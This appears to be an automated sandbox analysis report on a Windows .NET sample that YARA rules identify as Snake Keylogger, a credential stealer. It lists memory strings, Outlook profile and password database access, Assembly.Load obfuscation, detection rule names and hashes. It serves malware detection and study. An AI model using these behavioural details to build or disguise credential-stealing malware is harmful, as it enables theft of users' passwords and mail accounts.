          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713673493.0000000007A50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.0000000004021000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165208883.0000000000422000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165351139.0000000000967000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Binary or memory string: OriginalFilenameJcWm.exeF vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, eUt9fLwjWkj1AUhmiI.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, eUt9fLwjWkj1AUhmiI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, eUt9fLwjWkj1AUhmiI.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, eUt9fLwjWkj1AUhmiI.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, eUt9fLwjWkj1AUhmiI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, eUt9fLwjWkj1AUhmiI.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, sCesRoL9fdy7v4Nm93.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, sCesRoL9fdy7v4Nm93.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, sCesRoL9fdy7v4Nm93.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, sCesRoL9fdy7v4Nm93.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, sCesRoL9fdy7v4Nm93.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, sCesRoL9fdy7v4Nm93.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, eUt9fLwjWkj1AUhmiI.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, eUt9fLwjWkj1AUhmiI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, eUt9fLwjWkj1AUhmiI.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.log
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Mutant created: NULL
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029BE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Virustotal: Detection: 37%
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe ReversingLabs: Detection: 27%
          Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: rasapi32.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: rasman.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: rtutils.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: secur32.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: JcWm.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: Binary string: JcWm.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe

          Data Obfuscation

          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Form4.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, eUt9fLwjWkj1AUhmiI.cs .Net Code: YRamDpFUrd System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.7a50000.3.raw.unpack, RK.cs .Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, eUt9fLwjWkj1AUhmiI.cs .Net Code: YRamDpFUrd System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, eUt9fLwjWkj1AUhmiI.cs .Net Code: YRamDpFUrd System.Reflection.Assembly.Load(byte[])
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Static PE information: 0x83F4679B [Sun Feb 26 01:30:03 2040 UTC]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Code function: 0_2_073F85E7 pushad ; iretd 0_2_073F861D
